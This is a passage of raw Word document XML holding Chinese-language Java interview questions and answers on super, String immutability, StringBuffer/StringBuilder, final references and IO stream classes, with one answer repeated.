        <w:t xml:space="preserve"> 是Java语言中的一个关键字，用于引用父类的成员变量和方法，或调用父类的构造方法。在一个子类中，可以使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关键字来访问父类的实例变量和实例方法。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以下是一些使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关键字的例子：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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访问父类的实例变量在上面的例子中，子类 Child 继承了父类 Parent 的实例变量 x，在子类中使用 super.x 可以访问父类的 x 变量并进行赋值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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调用父类的构造方法在上面的例子中，子类 Child 继承了父类 Parent 的构造方法，并在自己的构造方法中使用 super(x) 调用了父类的构造方法进行初始化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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调用父类的实例方法在上面的例子中，子类 Child 继承了父类 Parent 的方法 doSomething()，在子类中使用 super.doSomething() 可以调用父类的方法并执行其逻辑。同时，子类也可以在自己的方法中添加自己的逻辑。</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使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关键字可以让子类访问或调用父类的成员，从而实现更加灵活的继承和多态性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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字节和字符的区别？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字节和字符是计算机存储和处理数据的两种基本单位。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字节是计算机内存中存储数据的基本单位，它是计算机中最小的可寻址存储单元。一个字节可以存储8个二进制位，即8个0或1。字节通常用来存储ASCII码、二进制数据等，因为它可以用来表示256种不同的状态。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字符是人类语言中的基本单位，它是由字母、数字和符号组成的文本。字符可以用不同的编码方式存储在计算机中，其中最常用的编码方式是Unicode编码。Unicode编码可以表示世界上所有的字符，它使用16位或32位的整数来表示一个字符，而一个字节只能表示8位的数据，因此一个字符可能需要多个字节来存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字节和字符的主要区别在于存储的数据类型不同。字节可以用来存储二进制数据、数字等，而字符则用来表示人类语言中的文本。在Java中，byte是8位的有符号整数，可以表示-128到127之间的整数；而char是16位的无符号整数，可以表示0到65535之间的整数，通常用来表示Unicode字符。在Java中，可以使用InputStream和OutputStream类来处理字节流，可以使用Reader和Writer类来处理字符流。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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String 为什么要设计为不可变类？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String 类被设计为不可变类是基于以下几个原因：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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安全性：字符串经常用于表示敏感信息，如密码等，如果 String 是可变类，那么它们的值可以在不知情的情况下被更改，这可能会导致安全漏洞。通过设计 String 为不可变类，可以避免这个问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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线程安全性：多个线程并发地访问可变对象可能导致不一致的结果，如果 String 是可变类，那么在多线程环境下会存在安全隐患。通过设计 String 为不可变类，可以避免这个问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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效率：在 Java 中，字符串常量池是一块特殊的内存区域，它存储了所有的字符串常量，如果 String 是可变类，那么每次修改字符串时都需要创建一个新的字符串对象，这将导致频繁的对象创建和垃圾回收，影响性能。通过设计 String 为不可变类，可以避免这个问题。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因此，String 类被设计为不可变类，它的值在创建之后不能被修改。如果需要修改字符串，可以使用 StringBuilder 或 StringBuffer 类，它们是可变的字符串类，可以有效地解决字符串频繁修改的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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String、StringBuilder、StringBuffer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可以。使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 修饰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象，表示该对象的引用不能被改变，即不能让该引用指向另一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象，但是仍然可以通过该引用调用该对象的方法，例如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关键字的作用是使得变量、方法、类等不能被修改或继承。在这里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 修饰的是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象的引用，而非该对象本身，因此并不影响该对象的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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String 字符串修改实现的原理？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中，String 对象是不可变的，一旦被创建，就不能被修改。如果需要修改字符串，可以使用 StringBuffer 或 StringBuilder 类。这两个类都是可变的字符串类，可以进行插入、删除、替换等操作。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StringBuffer 和 StringBuilder 内部都使用了字符数组来存储字符串内容。当执行插入、删除、替换等操作时，它们会先将字符数组扩容，然后将原来的字符串内容复制到新的字符数组中，最后修改新的字符数组中的内容。这个过程称为“扩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StringBuffer 和 StringBuilder 的扩容策略是一样的，它们会在需要扩容时将字符数组长度增加为原来的 2 倍加上 2。这个策略可以有效地减少字符数组扩容的次数，提高字符串修改的效率。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需要注意的是，StringBuilder 是线程不安全的，如果需要在多线程环境下使用可变字符串，应该使用线程安全的 StringBuffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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String str = "i" 与 String str = new String("i") 一样吗？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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String 类的常用方法都有那些？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String 类是 Java 中非常常用的字符串类，提供了丰富的方法来操作字符串。以下是 String 类的一些常用方法：</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charAt(int index)：返回字符串指定索引位置的字符。</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concat(String str)：将指定的字符串连接到该字符串的末尾。</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contains(CharSequence s)：判断该字符串是否包含指定的字符序列。</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endsWith(String suffix)：判断该字符串是否以指定的后缀结束。</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equals(Object anObject)：比较该字符串与指定对象是否相等。</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equalsIgnoreCase(String anotherString)：比较该字符串与指定字符串是否相等（忽略大小写）。</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getBytes()：将字符串转换为字节数组。</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indexOf(int ch)：返回指定字符在该字符串中第一次出现的索引。</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isEmpty()：判断该字符串是否为空字符串。</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length()：返回该字符串的长度。</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replace(char oldChar, char newChar)：用指定的新字符替换该字符串中所有的旧字符。</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split(String regex)：根据指定的正则表达式将该字符串拆分为字符串数组。</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startsWith(String prefix)：判断该字符串是否以指定的前缀开始。</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substring(int beginIndex)：返回从指定索引开始到字符串结尾的子字符串。</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toLowerCase()：将该字符串中的所有字符转换为小写字母。</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toUpperCase()：将该字符串中的所有字符转换为大写字母。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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trim()：返回去除该字符串两端空格后的字符串。</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这些方法只是 String 类提供的一部分常用方法，还有很多其他的方法可以在 Java 官方文档中查看。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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final 修饰 StringBuffer 后还可以 append 吗？</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可以。使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 修饰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象，表示该对象的引用不能被改变，即不能让该引用指向另一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象，但是仍然可以通过该引用调用该对象的方法，例如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关键字的作用是使得变量、方法、类等不能被修改或继承。在这里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 修饰的是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象的引用，而非该对象本身，因此并不影响该对象的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中的 IO 流的分类？说出几个你熟悉的实现类？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 中的 IO 流主要分为四类：字节流、字符流、字节缓冲流、字符缓冲流。其中字节流可以用来操作二进制数据，而字符流则可以用来操作文本数据。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以下是几个我比较熟悉的实现类：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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字节流：InputStream、OutputStream、FileInputStream、FileOutputStream、ByteArrayInputStream、ByteArrayOutputStream、DataInputStream、DataOutputStream、ObjectInputStream、ObjectOutputStream 等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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字节缓冲流：BufferedInputStream、BufferedOutputStream 等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
